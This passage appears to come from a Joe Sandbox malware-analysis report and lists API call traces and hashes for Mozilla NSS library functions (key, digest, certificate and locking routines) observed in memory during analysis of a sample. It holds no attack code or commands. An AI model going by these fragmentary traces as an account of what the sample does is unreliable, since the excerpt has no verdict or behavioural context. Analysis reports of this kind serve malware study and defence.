                                                                                                                                                                                                                • Part of subcall function 6CAB05C0: PR_ExitMonitor.NSS3 ref: 6CAB05EA
                                                                                                                                                                                                              • PR_LoadLibrary.NSS3(wship6.dll), ref: 6CB8CDE8
                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB8CDFF
                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB8CE16
                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB8CE29
                                                                                                                                                                                                              • PR_UnloadLibrary.NSS3(00000000), ref: 6CB8CE48
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                                              • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                                              • API String ID: 601260978-871931242
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6CBD13BC,?,?,?,6CBD1193), ref: 6CBD1C6B
                                                                                                                                                                                                              • PR_NewLock.NSS3(?,6CBD1193), ref: 6CBD1C7E
                                                                                                                                                                                                                • Part of subcall function 6CB898D0: calloc.MOZGLUE(00000001,00000084,6CAB0936,00000001,?,6CAB102C), ref: 6CB898E5
                                                                                                                                                                                                              • PR_NewCondVar.NSS3(00000000,?,6CBD1193), ref: 6CBD1C91
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CAB21BC), ref: 6CAABB8C
                                                                                                                                                                                                              • PR_NewCondVar.NSS3(00000000,?,?,6CBD1193), ref: 6CBD1CA7
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CAABBEB
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CAABBFB
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: GetLastError.KERNEL32 ref: 6CAABC03
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CAABC19
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: free.MOZGLUE(00000000), ref: 6CAABC22
                                                                                                                                                                                                              • PR_NewCondVar.NSS3(00000000,?,?,?,6CBD1193), ref: 6CBD1CBE
                                                                                                                                                                                                              • PR_NewCondVar.NSS3(00000000,?,?,?,?,6CBD1193), ref: 6CBD1CD4
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6CBD1193), ref: 6CBD1CFE
                                                                                                                                                                                                              • PR_Lock.NSS3(?,?,?,?,?,?,?,6CBD1193), ref: 6CBD1D1A
                                                                                                                                                                                                                • Part of subcall function 6CB89BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CAB1A48), ref: 6CB89BB3
                                                                                                                                                                                                                • Part of subcall function 6CB89BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CAB1A48), ref: 6CB89BC8
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6CBD1193), ref: 6CBD1D3D
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE890,00000000,?,6CBD1193), ref: 6CBD1D4E
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6CBD1193), ref: 6CBD1D64
                                                                                                                                                                                                              • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6CBD1193), ref: 6CBD1D6F
                                                                                                                                                                                                              • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6CBD1193), ref: 6CBD1D7B
                                                                                                                                                                                                              • PR_DestroyCondVar.NSS3(?,?,?,?,?,6CBD1193), ref: 6CBD1D87
                                                                                                                                                                                                              • PR_DestroyCondVar.NSS3(00000000,?,?,?,6CBD1193), ref: 6CBD1D93
                                                                                                                                                                                                              • PR_DestroyLock.NSS3(00000000,?,?,6CBD1193), ref: 6CBD1D9F
                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,6CBD1193), ref: 6CBD1DA8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3246495057-0
                                                                                                                                                                                                              • Opcode ID: 62686fe1e473d930204277129c242e4a0bfee66980d0307cc1e384d03d95ed67
                                                                                                                                                                                                              • Instruction ID: bf9bc831116d3563c3dfc56572265c78cf6b94167aab734dc4e5d0b0b61057a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62686fe1e473d930204277129c242e4a0bfee66980d0307cc1e384d03d95ed67
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E231EBF1E007515BEB219F65AC41A6B76F8EF0165DB084938E84A87F41F771F418CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6CB25EC0,00000000,?,?), ref: 6CB25CBE
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6CB25CD7
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CB25CF0
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CB25D09
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6CB25EC0,00000000,?,?), ref: 6CB25D1F
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6CB25D3C
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB25D51
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB25D66
                                                                                                                                                                                                              • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6CB25D80
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strncmp$SecureStrdup_Util
                                                                                                                                                                                                              • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                                                                                                                                                              • API String ID: 1171493939-3017051476
                                                                                                                                                                                                              • Opcode ID: 5abd460c2a8425324c42f4a002fd094944b5d042ee2580338f4c161909bd155a
                                                                                                                                                                                                              • Instruction ID: 97911f8d2313e3f9e560fbaf209936316b09987c46351484639e5eeda0ad6024
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5abd460c2a8425324c42f4a002fd094944b5d042ee2580338f4c161909bd155a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D3124B07413A16BE7015A288C49F763768EF022CAF100530FE9DE6A85F77AD419C39A
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CBF1DE0,?), ref: 6CB26CFE
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB26D26
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CB26D70
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000480), ref: 6CB26D82
                                                                                                                                                                                                              • DER_GetInteger_Util.NSS3(?), ref: 6CB26DA2
                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB26DD8
                                                                                                                                                                                                              • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CB26E60
                                                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CB26F19
                                                                                                                                                                                                              • PK11_DigestBegin.NSS3(00000000), ref: 6CB26F2D
                                                                                                                                                                                                              • PK11_DigestOp.NSS3(?,?,00000000), ref: 6CB26F7B
                                                                                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CB27011
                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6CB27033
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB2703F
                                                                                                                                                                                                              • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CB27060
                                                                                                                                                                                                              • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CB27087
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE062,00000000), ref: 6CB270AF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2108637330-0
                                                                                                                                                                                                              • Opcode ID: 595c528834c35874f88961bfb86fbd98484bb9d5f008ecd5039347e4f32cfc25
                                                                                                                                                                                                              • Instruction ID: 00aad78b4506557ebeac57256e4ccb0912b8f9a2eafe5d82c262f0d2a41c6c42
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 595c528834c35874f88961bfb86fbd98484bb9d5f008ecd5039347e4f32cfc25
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44A1F6719182C09BEF109B24DC85BBB72A4EB8130CF244939E91CDBA85E77DD849C793
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB3ADB1
                                                                                                                                                                                                                • Part of subcall function 6CB1BE30: SECOID_FindOID_Util.NSS3(6CAD311B,00000000,?,6CAD311B,?), ref: 6CB1BE44
                                                                                                                                                                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CB3ADF4
                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB3AE08
                                                                                                                                                                                                                • Part of subcall function 6CB1B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBF18D0,?), ref: 6CB1B095
                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB3AE25
                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3 ref: 6CB3AE63
                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CC22AA4,6CB212D0), ref: 6CB3AE4D
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: TlsGetValue.KERNEL32(?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44C97
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44CB0
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: PR_Unlock.NSS3(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44CC9
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB3AE93
                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CC22AA4,6CB212D0), ref: 6CB3AECC
                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3 ref: 6CB3AEDE
                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3 ref: 6CB3AEE6
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB3AEF5
                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3 ref: 6CB3AF16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                                              • String ID: security
                                                                                                                                                                                                              • API String ID: 3441714441-3315324353
                                                                                                                                                                                                              • Opcode ID: 3324f375ba9bc14b9b59bf3fea890c16630ec58daed121dcadbc4be53ed8d580
                                                                                                                                                                                                              • Instruction ID: 281c10c9a4382caebf97f95d13a06ae23902b107f690b89749ee0c82ced5f65b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3324f375ba9bc14b9b59bf3fea890c16630ec58daed121dcadbc4be53ed8d580
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B41F7B68042B067EF115A589C45BBE32B8EF4271CF340525E85CD6FD1FB399A488AD3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB52BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CB52A28,00000060,00000001), ref: 6CB52BF0
                                                                                                                                                                                                                • Part of subcall function 6CB52BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CB52A28,00000060,00000001), ref: 6CB52C07
                                                                                                                                                                                                                • Part of subcall function 6CB52BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6CB52A28,00000060,00000001), ref: 6CB52C1E
                                                                                                                                                                                                                • Part of subcall function 6CB52BE0: free.MOZGLUE(?,00000000,00000000,?,6CB52A28,00000060,00000001), ref: 6CB52C4A
                                                                                                                                                                                                              • free.MOZGLUE(?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB580C1), ref: 6CB55D0F
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB580C1), ref: 6CB55D4E
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB580C1), ref: 6CB55D62
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB580C1), ref: 6CB55D85
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB580C1), ref: 6CB55D99
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB580C1), ref: 6CB55DFA
                                                                                                                                                                                                              • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB580C1), ref: 6CB55E33
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CB55E3E
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CB55E47
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB580C1), ref: 6CB55E60
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CB55E78
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,6CB5AAD4), ref: 6CB55EB9
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,6CB5AAD4), ref: 6CB55EF0
                                                                                                                                                                                                              • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6CB5AAD4), ref: 6CB55F3D
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CB5AAD4), ref: 6CB55F4B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4273776295-0
                                                                                                                                                                                                              • Opcode ID: c9818cdcbccc603536040bed8865bd45a8a01353dbb497e8661a0e845b76d5a6
                                                                                                                                                                                                              • Instruction ID: 72abb8befe8ee811bf065a1767a3cff7f5d54524e72d17b859055315df867328
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9818cdcbccc603536040bed8865bd45a8a01353dbb497e8661a0e845b76d5a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1471CEB5A00B409FD701CF24D885A96B3F5FF89309F148528E85E87B11EB31F969CB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?), ref: 6CAD8E22
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAD8E36
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6CAD8E4F
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,?,?,?), ref: 6CAD8E78
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CAD8E9B
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CAD8EAC
                                                                                                                                                                                                              • PL_ArenaAllocate.NSS3(?,?), ref: 6CAD8EDE
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CAD8EF0
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6CAD8F00
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAD8F0E
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6CAD8F39
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6CAD8F4A
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6CAD8F5B
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CAD8F72
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CAD8F82
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1569127702-0
                                                                                                                                                                                                              • Opcode ID: fc0f3b3bdf4ed4276ec8958bb697ee91e139c28ac475bcd832607bf3e2da64ac
                                                                                                                                                                                                              • Instruction ID: d3fd6aaede45d79844d4c6a22daf884b2647a9c962070a7761c6a880c11a3998
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc0f3b3bdf4ed4276ec8958bb697ee91e139c28ac475bcd832607bf3e2da64ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E5118B2D00216AFD7009F69CC8596EB7B9FF45358B1A452AEC189B700E731FD858BD1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6CA4DD56
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6CA4DD7C
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CA4DE67
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6CA4DEC4
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA4DECD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$_byteswap_ulong
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 2339628231-598938438
                                                                                                                                                                                                              • Opcode ID: c9b1e889b891df5917ff2f6a57f108c4d7045cbbfbbae31ca0f33e1ed54e8a6f
                                                                                                                                                                                                              • Instruction ID: 5f81d29fd8c14473e2f9a76dda6ce456141a56934c13f7707d65c297dd0c1ed5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9b1e889b891df5917ff2f6a57f108c4d7045cbbfbbae31ca0f33e1ed54e8a6f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99A1D571B042419FC710CF29C880A6AB7F5EF85318F19C96DF8998BB51E771E885CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6CB0EE0B
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: malloc.MOZGLUE(6CB18D2D,?,00000000,?), ref: 6CB20BF8
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: TlsGetValue.KERNEL32(6CB18D2D,?,00000000,?), ref: 6CB20C15
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB0EEE1
                                                                                                                                                                                                                • Part of subcall function 6CB01D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CB01D7E
                                                                                                                                                                                                                • Part of subcall function 6CB01D50: EnterCriticalSection.KERNEL32(?), ref: 6CB01D8E
                                                                                                                                                                                                                • Part of subcall function 6CB01D50: PR_Unlock.NSS3(?), ref: 6CB01DD3
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB0EE51
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB0EE65
